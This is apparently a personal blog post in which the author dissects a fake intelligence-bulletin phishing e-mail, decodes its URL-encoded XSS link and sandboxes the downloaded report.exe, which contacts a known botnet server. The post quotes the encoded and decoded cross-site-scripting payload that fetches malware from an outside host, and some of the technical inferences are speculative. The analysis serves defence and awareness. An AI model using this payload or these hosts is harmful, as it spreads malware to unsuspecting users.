Reverse Engineering a Phishing E-Mail
So the other day, I came out of the movie theater and checked my iPhone to see what I missed while being entertained by Alice in Wonderland. In my AKO mail was a curious looking message about North Korea having tested a missile with a nuclear detonation in Okinawa, Japan. The message indicated alerts being made for pending mobilization of military units. WTF?
Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY (U//FOUO) DPRK has carried out nuclear missile attack on Japan 06 March 2010 (U//FOUO) Prepared by Defense Intelligence Agency (U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People's Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment. (U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization: CENTRAL INTELLIGENCE AGENCY DEFENSE INTELLIGENCE AGENCY DEPARTMENT OF ENERGY: OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE DEPARTMENT OF HOMELAND SECURITY: OFFICE OF INTELLIGENCE AND ANALYSIS DEPARTMENT OF STATE: BUREAU OF INTELLIGENCE AND RESEARCH DEPARTMENT OF THE TREASURY: OFFICE OF INTELLIGENCE AND ANALYSIS DRUG ENFORCEMENT ADMINISTRATION: OFFICE OF NATIONAL SECURITY INTELLIGENCE FEDERAL BUREAU OF INVESTIGATION NATIONAL SECURITY BRANCH NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY NATIONAL RECONNAISSANCE OFFICE NATIONAL SECURITY AGENCY UNITED STATES AIR FORCE UNITED STATES ARMY UNITED STATES COAST GUARD UNITED STATES MARINE CORPS UNITED STATES NAVY ________________ (U//FOUO) Additional information can be found in the following report: http://www.mod.gov.ge/2007/video/movie.php? l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69 %61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64 %6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c %2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74 %74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c %70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27 %29%3c%2f%73%63%72%69%70%74%3e%3c%22 ________________ Office of the Director of National Intelligence Washington, D.C. 20511
Naturally not clicking on the link for additional information, I turned to CNN, BBC and Google to confirm I did not miss Japan becoming the world's only nuclear triple-crown winner. After a cursory search, it appeared Japan was still merely a champion of the nuclear doubleheader. It irritated me though that I was getting these phishing e-mails so I decided to see where they were coming from.
For starters, what were the substitutions hiding? Character strings like %20 represent a hexadecimal value 0x20 (or 20h depending on your preference) that correlate to an ASCII index. Because a URL cannot contain spaces, using character substitutions allows a URL to put %20 in place of the space. It's typically used by digital miscreants for inserting shellcode in a text string, but can also be used to hide real text as numbers. Consulting a friendly ASCII table with hexadecimal lookups translates the "helpful link" into:
http://www.mod.gov.ge/2007/video/movie.php?l=G&v="> <a href="http://officialweightlosshelp.org/mf-admin/report.zip">Download </a> <script>window.open('http://officialweightlosshelp.org/wp-admin/report.zip')</script><"
So I turned to my VirtualBox testing environment from when I wrote What Traffic is on a TOR Relay and accessed the two websites to check them out safely without harming my machine.
At first glance, it would seem a site in Georgia was being exploited by a cross-site-scripting attack to redirect a viewer to a site that had been previously hacked (or fictitiously created) for file storage. Again, just a first glance would make somebody suspicious of Russian hackers from their previous cyber issues with Georgia and the targeting of American military over AKO. But that's just speculation - I'm not spending enough time on this to derive evidence to prove or disprove that theory.
Ultimately, all that really matters is the attack is designed to download the file report.zip to the user's computer. Performing a hex analysis showed it to be a true ZIP file so I used gzip in Linux to decompress it and then looked at it the EXE file with a hex editor.
The dump of the imports section of the Portable Executable file format reveals what functions this little program uses from various DLLs and Win32 API calls. It's a little easier to read simply using the command strings report.exe from the command line to dump human readable strings in lieu of finding them amidst the hexadecimal codes.
FormatMessageA CloseHandle ReadFile CreateFileA ExitProcess GetFileType HeapReAlloc WaitForSingleObject GetCurrentThread LoadLibraryA Sleep GetStdHandle HeapAlloc HeapFree GetProcessHeap GetVersion GetCommandLineA GetModuleHandleA KERNEL32.dll InsertMenuW LoadMenuW DrawIconEx CheckMenuItem DispatchMessageA PostThreadMessageA CharNextExA LoadStringA wsprintfA ExitWindowsEx CloseClipboard SetClipboardData EmptyClipboard OpenClipboard DrawMenuBar RemoveMenu CheckMenuRadioItem PostQuitMessage TranslateMessage DispatchMessageW USER32.dll ControlService CloseServiceHandle LookupPrivilegeValueA AdjustTokenPrivileges SetServiceStatus SetSecurityDescriptorDacl RegisterServiceCtrlHandlerA RegEnumKeyA RegSetValueExA InitializeSecurityDescriptor StartServiceCtrlDispatcherA RegQueryValueExA RegOpenKeyExA RegCloseKey ADVAPI32.dll WS2_32.dll strcat strcmp strchr MSVCRT.dll _exit _XcptFilter exit __p___initenv __getmainargs _initterm __setusermatherr _adjust_fdiv __p__commode __p__fmode __set_app_type _except_handler3 _controlfp
Now, without having to bother stepping through the code itself, it should be intuitively obvious to the most casual observer (as my high school physics teacher used to say) that the family of function calls center around privilege checks, registry access, heap calls, service access and the Windows clipboard. Those sound like the functions necessary for heap and buffer overrun exploitation with checks to confirm escalated privilege. That means the bug probably is the result of a race condition, hence the privilege check prior to installing whatever final features it deploys as a Windows service. More than likely, now that the host is part of a BotNet, the remainder of the infection code (probably a rootkit) will then be downloaded from a control center for installation under the newly assumed administrator privileges. No obvious strings existed for network access to obtain the remainder of the code, so its likely the code itself is obfuscated by an internal encryption algorithm - which is fine because I didn't want to spend time decoding opcode anyway.
Instead, I simply cloned a Windows sandbox in VirtualBox and allowed the infection to install itself while monitoring network activity with WireShark. Running a stock Windows XP without any service packs, I accessed the Georgian Ministry of Defense page with the URL whereupon the script did in fact execute the downloaded report.exe file. WireShark showed name resolution and activity subsequently to updatekernel.com which was the predicted behavior. This server has previously been identified as Chinese in association with the command and control for the Kneber BotNets and other identity theft Phishing activities. Needless to say, this variation did not show up on either Symantec or ClamAV virus scanners which may be a function of encrypting obfuscation or simply an updated variant with a new signature.
[Post Edit 1] I actually re-ran this test today and found that apparently the particular link no longer works. It would seem the Georgian Ministry of Defense patched the vulnerability on their website that allowed the link to go through, but I'd saved a copy of the report.exe binary from before. I reverted the Windows XP sandbox to a pre-infection VirtualBox snapshot in order to install Service Pack 2. This was a necessary requirement for installing ProcessMonitor from Mark Russinovich's fabled SysInternals toolkit. The output above shows the output where processmonitor logged all of report.exe's activity to the registry and filesystem as it executed. A complete 35 page log is available here for your own perusal, but a lot of activity focuses around browsing the Internet cache, the stored certificates and the cryptologic functions. There was also a series of tests regarding registry accesses and post-clipboard functions. A more thorough analysis with a Win32 debugger to correlate each activity to a code section would, of course, provide a more detailed breakdown. The bottom line, it takes under two seconds for the code to execute, compromise your system and locate information that could be used to impersonate you or clone your credentials.
Let this be just another simple lesson of why you should not click on links sent to you in e-mails. Unless you like being part of a Russian/Chinese/DPRK BotNet and having your identity stolen.
[Post Edit 2] I couldn't resist. My cousin pointed me towards a shareware Win32 debugger called OllyDbg so I went ahead and copied that into my sandbox. The last time I used to do this sort of thing, I was using the old-school DOS debug and Borland debuggers. Once again, I reverted to an older, pre-infection snapshot and loaded the report.exe file. Just as predicted, while the code loaded and OllyDbg performed its heuristic analysis, it indicated the primary code section was likely compressed or encrypted (as any attack should be). I think I've found my next source of distraction, I'm not going to be able to resist diving back into the world of reversing code puzzles. 0111 1010 0110 1001